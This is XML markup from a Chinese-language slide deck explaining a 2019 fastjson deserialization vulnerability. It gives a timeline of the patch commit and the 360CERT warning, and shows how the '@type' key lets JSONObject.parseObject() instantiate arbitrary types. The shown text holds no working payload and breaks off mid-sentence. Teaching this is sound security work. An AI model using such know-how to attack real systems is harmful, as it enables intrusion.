              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2019-09-03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提交修补</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2019-09-05 360CERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>发布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>预警</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>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28717041"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="2184008"/>
            <a:ext cx="22625731" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开发者就用第一种方法输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串，这里测试代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中第二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>种方法写出来，是想告诉大家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以识别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中的一些特殊的属性，比如说如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串中某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>@type”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，它就认为该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用于指定该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串对应对象的类型。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSONObject.parseObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON.parseObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等方法将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串反序列化为对象，大同小异，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的反序列化漏洞就是存在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSONObject.parseObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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13624284"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="2184008"/>
            <a:ext cx="22625731" cy="8217634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       既然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>必须指定对象类型，但是实际开发中大多数时候是并不知道对象类型的，这样怎么办呢？通常开发者会将对象类型设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Object.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，毕竟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中所有类都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的子类。那这样又会出现一个问题，既然所有类都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的子类，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如何知道反序列化对象的类型是什么呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以通过识别“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>@type”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>来指定对象类型。这也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为什么通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSONObject.parseObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
